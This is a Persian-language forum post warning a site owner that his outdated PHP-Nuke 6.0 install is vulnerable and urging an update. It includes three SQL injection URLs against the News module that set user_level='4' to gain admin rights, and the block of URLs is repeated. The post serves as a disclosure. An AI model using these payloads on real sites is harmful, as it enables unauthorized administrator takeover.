reza_marshal
New Member
من صحبتي با مجيد دارم كه متاسفانه از Php-nuke ورژن 6.0 استفاده ميكنه ! بايد بگم Php بسيار حساس ميباشد و البته هيچ چيز در اينترنت 100٪ Secur نيست حتي فرم هاي Vbulletin كه هر روز نقطه ضعفي در آن پيدا ميشود متاسفانه ورژن Php-nuke كه الان مورد استفاده ي سايت Majidonline قرار گرفته قديمي و بسيار آسيب پذير ميباشد حتي در سايت ما www.y4hoo.net تمامي Exploit هاي اين ورژن وجود داره من براي نمونه برانون 3 اكسپلويت كه ميتوان در اينا با يوزر ادمين وارد شد را مينويسم ( البته ناقص است و فكر هك كردن اينجا به سرتون نزنه ) البته اگه خود مجيد بخواد من كامل اين اكسپلويت ها رو ميدم كه ببينه اما پيشنهاد من اينه كه حتما ورژن Php-nuke را Update كنيد وگرنه انسانهايي وجود دارند كه از اين تقطه ضعف سو استفاده كنند !
http://[target]/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4
or
http://[target]/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4
or
http://[target]/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4
از اونجايي كه تيم ما www.y4hoo.net در ضمينه ي سكيوريتي و فعاليت ميكنه لازم ديدم به مجيد كه اخطار بدم چون من خودم از اينجا خيلي استفاده ميكنم و به نظرم سايت مفيدي ميباشد
http://[target]/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4
or
http://[target]/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4
or
http://[target]/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4
از اونجايي كه تيم ما www.y4hoo.net در ضمينه ي سكيوريتي و فعاليت ميكنه لازم ديدم به مجيد كه اخطار بدم چون من خودم از اينجا خيلي استفاده ميكنم و به نظرم سايت مفيدي ميباشد
